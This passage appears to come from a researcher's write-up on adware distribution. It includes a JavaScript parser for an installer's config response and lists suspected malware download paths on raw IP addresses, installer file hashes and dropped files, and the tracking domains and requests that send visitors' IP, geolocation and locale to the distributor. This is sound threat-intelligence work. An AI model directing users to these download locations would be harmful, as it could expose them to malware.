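    const sec = line.match(/^\[(.+)\]$/);
    if (sec) {
      section = sec[1];
      cfg[section] = cfg[section] || {};
      continue;
    }
    const kv = line.match(/^([^=]+)=(.*)$/);
    if (kv && section !== null) {
      cfg[section][kv[1].trim()] = kv[2].trim().replace(/^"(.*)"$/, '$1');
    }
  }
  return cfg;
}

// The fields that show what the installer learned about the visitor.
function leakedFields(cfg) {
  const user = cfg.UserInfo || {};
  return {
    ip: user.IPAddress,
    geo: user.GeoLocation,
    locale: (cfg.Installer || {}).Locale,
    serverLocation: (cfg.Server || {}).Location,
  };
}

console.log(leakedFields(parseIni(decodeConfig(SAMPLE_CFG_BYTES))));
```

Point it at the raw bytes of a real get_cfg.php response and the same three calls give you the parsed sections; the BOM check is what keeps a UTF-16 file from turning into the "P u b l i s h e r" mush seen in the console dump.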
Good researcher friends to whom I promised confidentiality advised that the site also contains "suspected" malware (I didn't analyze it yet) as follows:
> 46.165.199.26/v9/
> 46.165.199.26/v10/ VirusTotal Check is HERE-->>>[CLICK]
> 46.165.199.26/v14/
> 46.165.199.26/v52/
> 46.165.199.26/v209/
As you can see, adware is something we cannot just ignore. This adware's distributor is starting to play nasty and to victimize innocent people.
Additional/updated Note:
↑I am following the reported downloaded program described above (VT Report).
This file explains to us why the PC information got uploaded to the server.
File: WxDownload.exe 68ee6e35ef7f495be727131dc4ef5ed9
It is a binary installer built with Tarma InstallMate 7, which like the usual installer drops:
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setup.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setupx.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.exe
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.ico
C:\Document..\Local Settings\Temp\Tsu5F686192.dll
(I don't go into details on it yet.....)
↑It is "assumed" that those will start installing nasty adware on your PC and so on..
(I am sorry for not going into detail on it either)
My point is, this installer sends your PC data to the motherships as below;
DNS QUERIES:
www.reportde.info IN A +
www.destorage.info IN A +
www.reportnl.info IN A +
www.nlstorage.info IN A +
HTTP POSTS:
www.reportde.info POST
www.reportnl.info POST
values: "/installmate/php/track_installer_products.php?installer_version=75 HTTP/1.1"
HTTP REQUESTS:
www.destorage.info GET (3 times)
www.nlstorage.info GET (3 times)
values =
/installmate/php/get_cfg.php?
step_id=1&
installer_id=5040612c774655.01371722&
publisher_id=10&
source_id=0&
page_id=0&
affiliate_id=0
&geo_location=JP&
locale=EN&
browser_id=4 HTTP/1.1
In the HTTP POST part it sends the installer version info, which maybe is OK, but..
In the HTTP GET part it sends your GeoIP location, PC locale, browser information,
and of course your IP address. It is a PoC proving why the records on the server exist.
OK, the research continues to the detected IP addresses of the Babylon spreader services.
Multiple directories were detected that are used for download link distribution:
> Fast check showed :
> /v9/
> /v17/
> /v14/
> /v16/
> /v20/
> /v21/
> /v10/
> /v26/
> /v37/
> /v33/
> /v27/
> /v34/
> /v31/
> /v43/
> /v46/
> /v47/
> /v48/
> /v45/
> /v51/
> /v42/
> /v58/
> /v56/
> /v52/
> /v54/
> /v53/
> /v57/
> /v62/
> /v68/
> /v64/
> /v66/
> /v69/
> /v70/
> /v72/
> /v67/
> /v75/
> /v71/
> /v73/
> /v78/
> /v76/
> /v74/
> /v77/
> /v79/
> /v82/
> /v80/
> /v81/
> /v87/
> /v86/
> /v88/
> /v84/
> /v83/
> /v98/
> /v94/
> /v96/
> /v95/
> /v99/
> /v97/
>
> I guess you can try 1xx, 2xx, 3xx
Other researchers detected a mirroring scheme on 46.165.199.26 to IP addresses in the same segment:
46.165.199.26/v14/ 301720
46.165.199.3/v14/ 301720
46.165.199.25/v14/ 301720
Some similarities among the downloaded files were also detected:
> http://95.211.152.157/v17/ 299048
> filename="BCool.exe"
> http://95.211.150.1/v17/ 299048
> filename="BCool.exe"
> http://95.211.152.156/v17/ 299048
> filename="BCool.exe"
Feel free to add your comments with current information.